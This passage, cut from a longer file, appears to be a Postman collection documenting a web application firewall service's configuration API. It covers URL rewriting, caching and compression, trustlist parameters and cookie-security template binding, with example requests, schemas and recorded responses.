         {\n                \"action\": \"rewrite-url\",\n                \"name\": \"reurl\",\n                \"rewrite-from\": \"/test\",\n                \"rewrite-to\": \"/admin\",\n                \"seq\": \"2\"\n            }\n        ]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/rewriting-requests","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","rewriting-requests"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint ID."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:49:13 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"67"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"6c6e4c9f-7df8-11e9-82ad-793153bd356d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLY_AHacIAMFjgw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce7a1f9-abb07f2757b1e34823bc6503;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Unsupported method or error key 'rewriting-requests'!\"\n}"},{"id":"b737578c-105f-433b-92d0-d1e6ca46b346","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"XForwardedFor\": {\n        \"x-real-ip\": \"enable\",\n        \"x-forwarded-for-support\": \"enable\",\n        \"identify-original-ip\": \"enable\",\n        \"original-ip-header\": \"X-Forwarded-For\"\n    },\n    \"UrlRewritePolicy\": {\n        \"rule\": [\n            {\n                \"action\": \"rewrite-host\",\n                \"name\": \"rewrite-host\",\n                \"rewrite-from\": \"zzz.com\",\n                \"rewrite-to\": \"rr.com\",\n                \"seq\": \"1\"\n            },\n            {\n                \"action\": \"rewrite-url\",\n                \"name\": \"reurl\",\n                \"rewrite-from\": \"/test\",\n                \"rewrite-to\": \"/admin(\",\n                \"seq\": \"2\"\n            }\n        ]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/rewritingrequests","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","rewritingrequests"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint ID."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:47:43 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"78"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"36338c9d-7df8-11e9-ac5e-e7dd1bb58176"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLYwyEc8IAMFvKg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce7a19e-76dd99190f53975b2f4cfb6a;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'rewrite-to': 'sepcial char not allowed input ('}\"\n}"}],"_postman_id":"86186c02-b9f8-4b10-8af9-fcf0e73472d0"},{"name":"Get Caching and Compression","id":"fb1524dc-329b-44e7-b7f8-bc0c39aea404","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/cachingandcompression","description":"<p>Get the default-cache-timeout value of web cache policy and the content types that you want to compress in file compress rule.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","cachingandcompression"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"04f0a801-732b-41a9-8335-1c27869a2ac2","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CachingAndCompression","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CachingAndCompression"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 15 May 2019 07:35:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"ff5e61b5-76e3-11e9-9522-81dfc78f0fb9"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"ZtshJFw-oAMFf6A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"5513d1ba-c40c-451b-8109-80cc29af8396","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CachingAndCompression","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CachingAndCompression"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 15 May 2019 07:08:56 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"572"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"4dbfd46e-76e0-11e9-872d-4f1f26b7e4af"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZtopQHY7IAMFwFw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cdbbb08-98c580457d9dad3e17e739dc;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"template_status\": \"disable\",\n        \"CachingAndCompression\": {\n            \"web-cache-policy\": {\n                \"default-cache-timeout\": 1440\n            },\n            \"file-compress-rule\": {\n                \"content-types\": [\n                    {\n                        \"content-type\": \"application/javascript\"\n                    },\n                    {\n                        \"content-type\": \"application/json\"\n                    },\n                    {\n                        \"content-type\": \"application/rss+xml\"\n                    },\n                    {\n                        \"content-type\": \"application/soap+xml\"\n                    },\n                    {\n                        \"content-type\": \"application/x-javascript\"\n                    },\n                    {\n                        \"content-type\": \"application/xml(or)text/xml\"\n                    },\n                    {\n                        \"content-type\": \"text/css\"\n                    },\n                    {\n                        \"content-type\": \"text/html\"\n                    },\n                    {\n                        \"content-type\": \"text/javascript\"\n                    },\n                    {\n                        \"content-type\": \"text/plain\"\n                    }\n                ]\n            }\n        }\n    }\n}"}],"_postman_id":"fb1524dc-329b-44e7-b7f8-bc0c39aea404"},{"name":"Update Caching and Compression","id":"a650cd3e-530b-4f6f-b9cf-f58e50cf785c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"CachingAndCompression\": {\n        \"web-cache-policy\": {\n            \"default-cache-timeout\": 100\n        },\n        \"file-compress-rule\": {\n            \"content-types\": [\n                {\n                    \"content-type\": \"application/javascript\"\n                },\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/json\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/rss+xml\"\n\t\t\t\t}\n            ]\n        }\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/cachingandcompression","description":"<p>Update the default-cache-timeout value of web cache policy and the content types that you want to compress in file compress rule. </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"type\": \"object\",\n    \"required\": [\n      \"CachingAndCompression\"\n    ],\n    \"properties\": {\n    \"_status\": {\n        \"description\": \"Configure to enable or disable caching and compression\",\n        \"type\": \"string\",\n        \"enum\": [\"enable\", \"disable\"],\n        \"default\": \"disable\"\n     },\n     \"template_status\": {\n        \"description\": \"Configure to enable or disable the module's template status\",\n        \"type\": \"string\",\n        \"enum\": [\n           \"enable\",\n           \"disable\"\n        ],\n        \"default\": \"disable\"\n     },\n     \"CachingAndCompression\": {\n       \"type\": \"object\",\n       \"properties\": {\n         \"web-cache-policy\": {\n           \"type\": \"object\",\n           \"properties\": {\n             \"default-cache-timeout\": {\n               \"description\": \"The time to live for each entry in the cache\",\n               \"type\": \"integer\",\n               \"default\": 1440,\n               \"minimum\": 10,\n               \"maximum\": 2880\n             }\n           }\n         },\n         \"file-compress-rule\": {\n           \"type\": \"object\",\n           \"properties\": {\n             \"content-types\": {\n               \"type\": \"array\",\n               \"items\": {\n                 \"type\": \"object\",\n                 \"minItems\": 0,\n                 \"maxItems\": 10,\n                 \"properties\": {\n                   \"content-type\": {\n                     \"description\": \"Select the content types you want to compress\",\n                     \"type\": \"string\",\n                     \"enum\": [\"application/javascript\", \"application/json\", \"application/rss+xml\", \"application/soap+xml\", \"text/plain\",\n                              \"application/x-javascript\", \"application/xml(or)text/xml\", \"text/css\", \"text/html\", \"text/javascript\"]\n                   }\n                 }\n               }\n             }\n           }\n         }\n       }\n     }\n   }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","cachingandcompression"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"5fe197de-db81-4bba-918e-f3c3e7d60f7f","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"CachingAndCompression\": {\n        \"web-cache-policy\": {\n            \"default-cache-timeout\": 100\n        },\n        \"file-compress-rule\": {\n            \"content-types\": [\n                {\n                    \"content-type\": \"application/javascript\"\n                },\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/json\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/rss+xml\"\n\t\t\t\t}\n            ]\n        }\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CachingAndCompression","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CachingAndCompression"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 15 May 2019 07:44:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"36ca813f-76e5-11e9-88ee-9fec104205e0"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"ZttyyH9YIAMFcVw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"b0e2eea4-ee27-4096-b9ba-6237e1755206","name":"Parameter invalid","originalRequest":{"method":"PUT","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"CachingAndCompression\": {\n        \"web-cache-policy\": {\n            \"default-cache-timeout\": 7200\n        },\n        \"file-compress-rule\": {\n            \"content-types\": [\n                {\n                    \"content-type\": \"application/javascript\"\n                },\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/json\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/rss+xml\"\n\t\t\t\t}\n            ]\n        }\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CachingAndCompression","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CachingAndCompression"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 15 May 2019 07:47:29 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"94"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"b07003ae-76e5-11e9-9b7d-91a942812b95"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZtuSrHAGIAMFU_A="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cdbc411-7e12bb6c252cb5e8d5d1c390;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'default-cache-timeout': 'Error value range, only allow 10-2880'}\"\n}"},{"id":"bcbccb7d-75c3-4d7b-af0d-4c011300f174","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"CachingAndCompression\": {\n        \"web-cache-policy\": {\n            \"default-cache-timeout\": 100\n        },\n        \"file-compress-rule\": {\n            \"content-types\": [\n                {\n                    \"content-type\": \"application/javascript\"\n                },\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/json\"\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t    \"content-type\": \"application/rss+xml\"\n\t\t\t\t}\n            ]\n        }\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CachingAndCompression","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CachingAndCompression"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 15 May 2019 07:46:55 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"9c5adf4c-76e5-11e9-86cd-8da10a45e07b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"ZtuNaF4DoAMFkOQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cdbc3ef-cfe0313435b6c924f72246c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"a650cd3e-530b-4f6f-b9cf-f58e50cf785c"},{"name":"Get Global Trustlist Parameter","id":"907c4a57-48f0-479e-a08c-6acf80f5c940","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/globatrustlistparameter","description":"<p>Get Global Trustlist Parameter configurations.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","globatrustlistparameter"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"598e6cd2-43cf-42c7-97f5-ce078074a504","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/globatrustlistparameter","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","globatrustlistparameter"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:39:50 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"223"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"59581bfa-933f-11e9-8cdd-5588415f6d89"},{"key":"Access-Control-Allow-Origin","value":"https://www.c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkof-FpzoAMFv5w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b5466-70777372cf2d1c0eaf05f002;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"globatrustlistparameter\": [{\n            \"name\": \"/p1\",\n            \"request-file\": \"/p1\",\n            \"request-file-status\": \"disable\"\n        }, {\n            \"name\": \"p2\",\n            \"request-file\": \"/p22\",\n            \"request-file-status\": \"disable\"\n        }],\n        \"_status\": \"enable\"\n    }\n}"},{"id":"c1aebd7a-6bab-4be6-b290-3e137704a9b2","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/globatrustlistparameter","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","globatrustlistparameter"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:40:13 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6768b993-933f-11e9-a6f6-395026ffcf52"},{"key":"Access-Control-Allow-Origin","value":"https://www.c8.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"bkojqGtUoAMFp_g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"907c4a57-48f0-479e-a08c-6acf80f5c940"},{"name":"Update Global Trustlist Parameter","id":"a6d85214-6293-4a84-a2b1-3e2e28c560d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"globatrustlistparameter\": [\n    {\n      \"name\": \"/p1\",\n      \"request-file\": \"/p1\",\n      \"request-file-status\": \"disable\"\n    },\n    {\n      \"name\": \"p2\",\n      \"request-file\": \"/p22\",\n      \"request-file-status\": \"disable\"\n    }\n  ],\n  \"_status\": \"enable\"\n}\n"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/globatrustlistparameter","description":"<p>Update Global Trustlist Parameter configurations.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"type\": \"object\",\n  \"properties\": {\n    \"_status\": {\n      \"description\": \"Configure to enable or disable Global Trustlist Parameter configurations\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"globaltrustlistparameter\": {\n      \"type\": \"array\",\n      \"maxItems\": 12,\n      \"items\": {\n        \"type\": \"object\",\n        \"required\": [\n          \"name\",\n          \"request-file\",\n          \"request-file-status\"\n        ],\n        \"properties\": {\n          \"domain\": {\n            \"type\": \"string\"\n          },\n          \"request-file\": {\n            \"type\": \"string\"\n          },\n          \"request-file-status\": {\n            \"type\": \"string\",\n            \"enum\": [\n              \"enable\",\n              \"disable\"\n            ]\n          }\n        }\n      }\n    }\n  }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","globatrustlistparameter"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2c886cf6-d84a-4a3a-a52d-356ce89be0f7","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n  \"globatrustlistparameter\": [\n    {\n      \"name\": \"/p1\",\n      \"request-file\": \"/p1\",\n      \"request-file-status\": \"disable\"\n    },\n    {\n      \"name\": \"p2\",\n      \"request-file\": \"/p22\",\n      \"request-file-status\": \"disable\"\n    }\n  ],\n  \"_status\": \"enable\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/globalwhitelistparameter","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","globalwhitelistparameter"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:41:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"9f1532f4-933f-11e9-97ac-a96c66690638"},{"key":"Access-Control-Allow-Origin","value":"https://www.c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bkoyQHWvoAMFZ3g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b54db-f1c8079a7db1f92ad4d863c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}\n"},{"id":"fbf40bd1-5000-46b7-99df-881dc5b6541f","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"},{"key":"authorization","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n  \"globatrustlistparameter\": [\n    {\n      \"name\": \"/p1\",\n      \"request-file\": \"hello\",\n      \"request-file-status\": \"disable\"\n    }\n  ],\n  \"_status\": \"enable\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/globalwhitelistparameter","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","globalwhitelistparameter"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 20 Jun 2019 09:42:59 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"c9f9450b-933f-11e9-97ac-a96c66690638"},{"key":"Access-Control-Allow-Origin","value":"https://www.c8.waasonline.com"},{"key":"x-amz-apigw-id","value":"bko9gHjgoAMFZ3g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d0b5523-cd1d3f4c56b1566c97d79a98;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'request-file': 'hello must start with /'}\"\n}"}],"_postman_id":"a6d85214-6293-4a84-a2b1-3e2e28c560d5"},{"name":"Update Module Template Status","id":"019fe539-af50-4acf-93cb-3ff6b0635a3f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"template_status\": \"enable\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/:module","description":"<p>Update the application module's template satus.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<p>1 Bind module's template</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n        \"template_status\": {\n            \"description\": \"Enable the module's template status\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\"\n            ]\n        }\n    }\n}\n\n</code></pre>\n<p>2 Unbind the module's template\nEvery application's module data should include the sub field: 'template_status': \"disable\" \nPlease refer to the cookie security example.</p>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id",":module"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"},{"description":{"content":"<p>The module name.</p>\n","type":"text/plain"},"type":"string","value":"{{module}}","key":"module"}]}},"response":[{"id":"2278d9f1-f1bc-469b-884c-dab40f1a8585","name":"Bind to Template (Cookie Security module)","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"token","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"template_status\": \"enable\"\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","cookiesecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"detail\": \"successfully\"}"},{"id":"e604fd41-6f9a-4457-bd4c-23d2d4d1d444","name":"Unbind from template (Cookie Security module)","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"token","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"disable\",\n    \"template_status\": \"disable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","cookiesecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"019fe539-af50-4acf-93cb-3ff6b0635a3f"},{"name":"Get Endpoint Modules","id":"d2d89872-73e0-42d7-bf26-9d038665d7b9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/modules","description":"<p>Get all modules' status of the EndPoint.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","modules"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"0cab763a-11ab-46c4-a790-ec7453f62efb","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","modules"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:14:14 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1841"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"fd2a639c-8bf6-11e9-a3b7-c5c44c9c7e30"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGFk5GnHSQ0FhSQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff1c85-d216f23a0abc99241a42ee34;Sampled=0"}],"cookie":[],"responseTime":null,"body":"[\n  {\n    \"id\": \"attack_log_export\",\n    \"status\": \"disable\",\n    \"inherited\": \"disable\"\n 